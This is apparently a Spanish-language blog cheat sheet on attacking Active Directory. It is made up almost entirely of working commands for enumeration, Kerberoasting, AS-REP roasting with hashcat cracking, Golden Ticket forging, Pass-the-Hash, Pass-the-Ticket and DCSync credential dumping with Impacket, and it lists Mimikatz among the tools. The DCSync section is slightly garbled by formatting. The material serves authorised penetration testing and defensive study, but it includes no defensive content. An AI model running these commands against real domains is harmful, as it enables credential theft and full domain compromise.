blog / active-directory-attacks

ciberseguridad

Ataques a Active Directory — Guía de referencia

Referencia completa de ataques a Active Directory: Kerberoasting, AS-REP Roasting, Pass-the-Hash, DCSync, Golden Ticket y técnicas de movimiento lateral.

9 de agosto de 20241 min read
Active DirectoryKerberosNTLMBloodHoundImpacket

Enumeración inicial

LDAP

bash
ldapsearch -x -H ldap://DC_IP -b "dc=domain,dc=local" "(objectClass=user)" sAMAccountName

BloodHound

bash
bloodhound-python -u user -p 'password' -d domain.local -dc dc.domain.local -c all

Ataques a Kerberos

Kerberoasting

Solicitar tickets TGS para cuentas de servicio y crackear offline:

bash
GetUserSPNs.py domain.local/user:password -dc-ip DC_IP -request
hashcat -m 13100 tgs.hash /usr/share/wordlists/rockyou.txt

AS-REP Roasting

Atacar cuentas sin pre-autenticación Kerberos:

bash
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip DC_IP -no-pass
hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt

Golden Ticket

Con el hash del KRBTGT, crear tickets Kerberos arbitrarios:

bash
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py domain.local/Administrator@dc.domain.local -k -no-pass

Movimiento lateral

Pass-the-Hash

bash
psexec.py domain.local/Administrator@TARGET -hashes LM:NTLM
wmiexec.py domain.local/Administrator@TARGET -hashes LM:NTLM

Pass-the-Ticket

bash
export KRB5CCNAME=ticket.ccache
smbclient.py domain.local/user@TARGET -k -no-pass

DCSync

Requiere privilegios
bash
Replicating Directory Changes
:
bash
secretsdump.py domain.local/user:password@DC_IP

Herramientas esenciales

  • Impacket: Suite de herramientas para protocolos de red de Windows
  • BloodHound: Análisis de relaciones y paths de ataque en Active Directory
  • CrackMapExec / NetExec: Swiss army knife para pentesting de redes Windows
  • Rubeus: Herramienta para abuso de Kerberos desde Windows
  • Mimikatz: Extracción de credenciales de memoria